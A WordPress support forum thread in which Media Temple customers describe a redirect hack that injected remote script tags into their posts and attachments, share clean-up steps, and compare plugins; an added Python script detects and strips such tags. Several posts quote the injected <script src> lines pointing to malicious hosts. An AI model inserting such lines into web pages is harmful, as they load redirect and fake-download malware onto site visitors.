Media Temple oeaou hack
-
Hi,
I looked in one of my pages today and now all of a sudden all my pages and posts have <script src="http://ue.oeaou.com/31"></script> when you view the page in the HTML. Was my site hacked or was this put in here by a plugin?
-
I got the same thing. What plugins do you use? Maybe we have some of the same ones.
I have the same problem on several sites. I have checked the plugins I use, but they are different on the installations.
Well, I had the same problem. MediaTemple is my hosting provider, and they helped me out with this. This is a WordPress Redirect Exploit hack that puts a line of code in your database tables wp_posts and wp_cats_posts.
The line that is put by the hack in your wp_posts and wp_cats_posts can be one of these or similar:
<script src="http://ae.awaue.com/7"></script>
<script src="http://ue.oeaou.com/31"></script>
<script src="http://ie.eracou.com/3"></script>
<script src="http://ao.euuaw.com/9"></script>
You must delete all of these lines.
Symptoms
* Visitors viewing posts on your blog may be redirected to third-party sites.
* Visitors may also be redirected to qooglesearch.com, which has already been disabled.
Clean-Up
Search in your database (especially in the "wp_posts" and "wp_cats_posts" tables) for strings like these and delete them.
Info taken from: http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit
I don't know if maybe some plugin is doing this. I have the following plugins, let me know if you have the same or which ones you have:
Adminimize
Akismet
cforms
Cleanup WordPress
Google Analyticator
Google News Sitemap
Google XML Sitemaps
HeadSpace2
Insights
jQuery Lightbox For Native Galleries
MobilePress
Podcasting Plugin by TSG
Post Tabs
Really Simple CAPTCHA
Revision Control
SEO Friendly Images
WordPress.com Stats
WP-PageNavi
WP-UserOnline
WP Geo
ZD YouTube FLV Player
Ah thanks for the reply. My sites are also hosted on a mediatemple server. So I will try now their solution.
I've noticed the same problem on a few Media Temple WordPress websites this morning. The fix above from Media Temple's site ended up fixing it.
Same problem here today on MediaTemple.
The <script src= is also inserted into media attachment descriptions, so make sure to clean those too.
Is it strange that everyone that is having a problem is using MediaTemple? I just noticed the same thing today.
Here are the plugins I am using:
Akismet
All in One Favicon
Announcement and Vertical Scroll News
BM Custom Login
Constant Contact API
Kimili Flash Embed
Store Locator
It looks like only Akismet is in common with you, Mediosia. I am trying to fix it on my database, but phpMyAdmin will not let me log in. MediaTemple is working on it, but at this point, I'm thinking about switching hosting. I have lots of other WordPress sites and never had this problem with different hosts.
Count me in. Found it on mine too.
And I'm on media temple.
<script src="http://ue.oeaou.com/31"></script>
This redirects people to a “Virus Scan” and asks them to download the “fix”
WOW!
Now I just have a big fat "Error establishing a database connection" on my home page.
I went through the cleanup process as mentioned by mediosia.
I'm good to go for now.
Seems to be a media temple issue, will sticky this for now.
http://codex.wordpress.org/FAQ_My_site_was_hacked has some info on what to do in the event of hacks, as well as referencing the above posts.
Fixed here too by removing all mentions via SQL, but what a nightmare, esp. if you have a few databases & multiple installs.
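The clean-up described in the thread (find the injected `<script src=...>` lines in post and attachment content, then delete them), as an added example that is not from any poster or from Media Temple. The row layout `(ID, post_type, post_content)`, the allowlisted host `static.example.org` and all function names are assumptions; the sample rows are constructed, using script hosts quoted in the thread.

```python
import re
from urllib.parse import urlparse

# An empty <script src=...></script> element, in any letter case.
SCRIPT_RE = re.compile(
    r'<script\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)["\']?[^>]*>\s*</script\s*>',
    re.IGNORECASE,
)

def clean_content(content, allowed_hosts=frozenset()):
    """Strip script tags whose host is not allowlisted; return (cleaned, hosts)."""
    removed = []

    def _replace(match):
        host = (urlparse(match.group(1)).hostname or "").lower()
        if host and host not in allowed_hosts:
            removed.append(host)
            return ""
        return match.group(0)  # relative or allowlisted script: keep as is

    return SCRIPT_RE.sub(_replace, content), removed

def scan_rows(rows, allowed_hosts=frozenset()):
    """rows: (ID, post_type, post_content) tuples exported from wp_posts (assumed layout)."""
    findings = []
    for post_id, post_type, content in rows:
        cleaned, hosts = clean_content(content or "", allowed_hosts)
        if hosts:
            findings.append((post_id, post_type, hosts, cleaned))
    return findings

# Constructed sample rows; attachments are included because the thread notes
# that media attachment descriptions were injected too.
SAMPLE_ROWS = [
    (1, "post", 'Hello world<script src="http://ue.oeaou.com/31"></script>'),
    (2, "page", '<p>About</p><script src="http://static.example.org/player.js"></script>'),
    (3, "attachment", 'Photo description<SCRIPT SRC="http://ae.awaue.com/7"></SCRIPT>'),
    (4, "post", "No script here"),
]

if __name__ == "__main__":
    for post_id, post_type, hosts, cleaned in scan_rows(SAMPLE_ROWS, {"static.example.org"}):
        print(f"ID {post_id} ({post_type}): removed {hosts} -> {cleaned!r}")
```

Review the findings and back up the database before writing any cleaned value back to `post_content`.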
On Mediatemple too. Called and they cleaned the DBs. As for plugs, the only ones I have in common with Mediosia are as follows:
Akismet
WP-Stats
WP-Pagenavi
@iso50 damn, they didn't clean my DBs, just sent me links on how to do it myself & more or less said it's not their problem.
Same again
Also on WordPress hosted by MediaTemple
The only ones I have in common are
Akismet
WP-Stats
Hopefully be able to clean up the database as per mediatemple suggestion… not the first time the MediaTemple blog has fallen over, whilst all the other hosting servers remain solid!
- The topic ‘Media Temple oeaou hack’ is closed to new replies.